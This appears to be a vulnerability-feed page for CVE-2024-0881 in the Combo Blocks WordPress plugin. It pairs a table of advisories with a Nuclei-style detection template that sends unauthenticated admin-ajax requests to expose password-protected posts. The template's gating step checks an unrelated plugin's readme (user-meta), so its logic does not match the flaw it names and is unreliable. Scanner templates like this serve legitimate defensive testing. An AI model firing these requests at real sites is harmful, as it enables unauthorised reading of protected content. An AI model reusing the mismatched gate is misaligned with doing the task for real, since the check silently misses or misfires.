| Reporter | Title | Published | Views |
|---|---|---|---|
| circl | CVE-2024-0881 | 13 Apr 2024 02:06 | – |
| cnnvd | WordPress plugin Combo Blocks security vulnerability | 11 Apr 2024 00:00 | – |
| cve | CVE-2024-0881 | 11 Apr 2024 15:36 | – |
| cvelist | CVE-2024-0881 Combo Blocks < 2.2.76 - Unauthenticated Password Protected Posts Access | 11 Apr 2024 15:36 | – |
| nvd | CVE-2024-0881 | 11 Apr 2024 16:15 | – |
| osv | CVE-2024-0881 | 11 Apr 2024 16:15 | – |
| patchstack | WordPress Post Grid and Gutenberg Blocks Plugin < 2.2.76 is vulnerable to Broken Access Control | 15 Apr 2024 00:00 | – |
| patchstack | WordPress Combo Blocks plugin < 2.2.76 - Unauthenticated Password Protected Posts Access vulnerability | 15 Apr 2024 11:03 | – |
| ptsecurity | PT-2024-15886 · WordPress · Post Blocks +5 | 11 Apr 2024 00:00 | – |
| redhatcve | CVE-2024-0881 | 23 May 2025 10:30 | – |

```yaml
id: CVE-2024-0881

info:
  name: Combo Blocks < 2.2.76 - Improper Access Control
  author: s4e-io
  severity: medium
  description: |
    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts.
  impact: |
    Unauthenticated attackers can access password-protected posts bypassing authentication restrictions, potentially exposing sensitive content.
  remediation: |
    Update Combo Blocks plugin to version 2.2.76 or later.
  reference:
    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
  classification:
    cve-id: CVE-2024-0881
    cwe-id: CWE-284
    epss-score: 0.16906
    epss-percentile: 0.96677
  metadata:
    verified: true
    max-request: 3
    publicwww-query: "/wp-content/plugins/user-meta/"
  tags: cve,cve2024,wp,wpscan,wordpress,wp-plugin,combo-blocks,exposure,vuln

# Request 2 is evaluated only if request 1 matches.
flow: http(1) && http(2)

http:
  # Request 1: gate for the flow. As written it looks for "User Profile Builder"
  # in the user-meta plugin's readme.txt, so request 2 runs only where that file
  # is served. `internal: true` keeps this matcher out of the reported results.
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"

    matchers:
      - type: word
        internal: true
        words:
          - "User Profile Builder"

  # Request 2: call the two AJAX actions without authentication. A 200 response
  # whose JSON body carries rendered HTML and pagination data is reported.
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"html"'
          - '"<div class='
          - '"pagination":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220344dd2d0c86a5b46e78929ffdf92f5c4fec60bde7e57b937817da5e122778627022100a982377fbd2f0f13a5dfe35c35169655061ebf28f9ee3e6243f9e9d1c18ea3db:922c64590222798bb761d5b6d8e72950
```